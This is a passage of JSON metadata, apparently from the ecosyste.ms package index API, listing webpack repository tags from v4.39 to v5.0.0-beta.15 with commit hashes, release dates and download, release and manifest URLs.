:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_a